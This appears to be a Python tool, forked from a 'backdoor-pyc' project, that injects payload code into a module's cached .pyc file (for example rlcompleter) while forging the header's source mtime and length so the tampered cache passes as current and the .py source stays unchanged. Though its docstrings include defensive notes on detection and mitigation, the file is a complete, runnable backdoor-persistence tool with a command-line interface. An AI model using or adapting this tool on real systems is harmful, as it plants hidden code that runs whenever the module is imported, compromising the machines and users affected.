forked from secretsquirrel/backdoor-pyc
backdoor-pyc3X.py
#!/usr/bin/env python3
import struct
import sys
import os
import builtins
import imp
import marshal
import py_compile
class patch_pyc:
    """Write a cached ``.pyc`` whose bytecode no longer matches its ``.py`` source.

    The constructor runs the whole pipeline: read the optional payload
    files, read the target module's source, compile source plus payload
    text in memory, and write the result into the module's ``__pycache__``
    entry.  The ``.py`` file itself is only read, never modified.

    Reviewer notes (defensive):
      * The header written by ``write_file`` carries the mtime and length of
        the *unmodified* source, so the cache entry presents itself as
        current for that source file.  Reviewing or hashing ``.py`` files
        alone will not reveal the change.
      * Detection: recompile each source file into a scratch location and
        compare the result with the cached ``.pyc``; include
        ``__pycache__/*.pyc`` in file-integrity monitoring and alert on
        writes to it by anything other than the package installer.
      * Mitigation: keep installation directories and their ``__pycache__``
        folders non-writable for unprivileged accounts.

    Args:
        org_file: Path to the target module's ``.py`` source.
        nix_payload: Optional path to a text file appended to the source.
        windows_payload: Optional path to a second text file appended after
            ``nix_payload``.
        version: Used verbatim in the cache file name
            (``.cpython-<version>.pyc``).  It is concatenated to strings in
            ``write_file``, so a ``str`` such as ``"35"`` is expected; the
            integer default would raise ``TypeError`` there.
    """

    def __init__(self, org_file, nix_payload=None, windows_payload=None, version=35):
        self.org_file = org_file
        self.nix_payload = nix_payload
        self.windows_payload = windows_payload
        self.version = version
        self.temp_bytecode = ''
        # Each stage stores its result on the instance for the next one.
        for stage in (
            self.read_payloads,
            self.get_bytecode,
            self.write_bytecode,
            self.write_file,
        ):
            stage()

    def read_payloads(self):
        """Load each configured payload file into ``self.nix`` / ``self.windows``.

        An attribute is only set when the matching path is truthy.
        """
        for attr_name, payload_path in (
            ("nix", self.nix_payload),
            ("windows", self.windows_payload),
        ):
            if payload_path:
                setattr(self, attr_name, open(payload_path, 'U').read())

    def get_bytecode(self):
        """Read the target module's source text and remember its length.

        Despite the name, this reads source, not bytecode.  The length is
        taken before anything is appended and is the value later written
        into the ``.pyc`` size field.
        """
        with open(self.org_file, 'U') as source_handle:
            source_text = source_handle.read()
        self.codestring = source_text
        self.oldpycsize = len(source_text)

    def write_bytecode(self):
        """Compile source plus payload text and marshal the code object.

        Nothing is written to disk here; the serialized code object is kept
        in ``self.temp_bytecode``.  The original file name is passed to
        ``compile`` as the code object's file name.
        """
        combined = self.codestring + "\n"
        if self.nix_payload:
            combined += self.nix
        if self.windows_payload:
            combined += self.windows
        self.codestring = combined
        code_object = builtins.compile(combined, self.org_file, 'exec')
        self.temp_bytecode = marshal.dumps(code_object)

    def write_file(self):
        """Overwrite the module's cache entry with the in-memory bytecode.

        The header consists of three fields: the running interpreter's magic
        number, the source file's mtime, and the original source length, the
        last two packed as little-endian unsigned 32-bit integers.  That is
        the timestamp-style layout (magic, mtime, size) with no flags word.
        """
        source_dir = os.path.dirname(os.path.abspath(self.org_file))
        module_stem = os.path.basename(self.org_file).split(".")[0]
        pyc_file = source_dir + "/__pycache__/" + module_stem + ".cpython-" + self.version + ".pyc"
        print("PYC file temp location:", pyc_file)

        timestamp = int(os.stat(self.org_file).st_mtime)
        print("Timestamp of python file:", timestamp)
        print("Length of python file:", self.oldpycsize)

        if not os.path.isfile(pyc_file):
            # No cache entry yet: ask py_compile to create one.  It writes to
            # the running interpreter's default cache path for this source.
            py_compile.compile(self.org_file)

        # 'r+b' overwrites from offset 0 without truncating, so when the
        # previous cache file was longer, its tail stays in place after the
        # new content.  Unexpected trailing bytes after the marshalled code
        # object are therefore a possible forensic indicator.
        with open(pyc_file, 'r+b') as cache_handle:
            cache_handle.write(imp.get_magic())
            cache_handle.write(struct.pack("<I", timestamp))
            cache_handle.write(struct.pack("<I", self.oldpycsize))
            cache_handle.write(self.temp_bytecode)
if __name__ == "__main__":
    # Command-line entry point.  A source path, a version string and at
    # least one payload file are required; when any of them is missing the
    # help text is printed and the process exits via sys.exit() with no
    # argument (exit status 0).
    import argparse

    cli = argparse.ArgumentParser(description="To replace rlcompleter.pyc with your code... for example")
    for short_flag, long_flag, help_text in (
        ("-p", "--path", "path to rlcompleter.py"),
        ("-l", "--nix", "payload for nix"),
        ("-w", "--windows", "payload for windows"),
        ("-v", "--version", "python3.X version - 35 for 3.5"),
    ):
        cli.add_argument(short_flag, long_flag, help=help_text)
    opts = cli.parse_args()

    if not opts.path:
        cli.print_help()
        sys.exit()

    if not opts.version:
        print("Need python version: '-v 35' for example.")
        cli.print_help()
        sys.exit()

    if not (opts.nix or opts.windows):
        cli.print_help()
        sys.exit()

    # The version arrives as a string from argparse and is used verbatim in
    # the cache file name built by patch_pyc.write_file.
    patch_pyc(opts.path, opts.nix, opts.windows, opts.version)
    print("Done")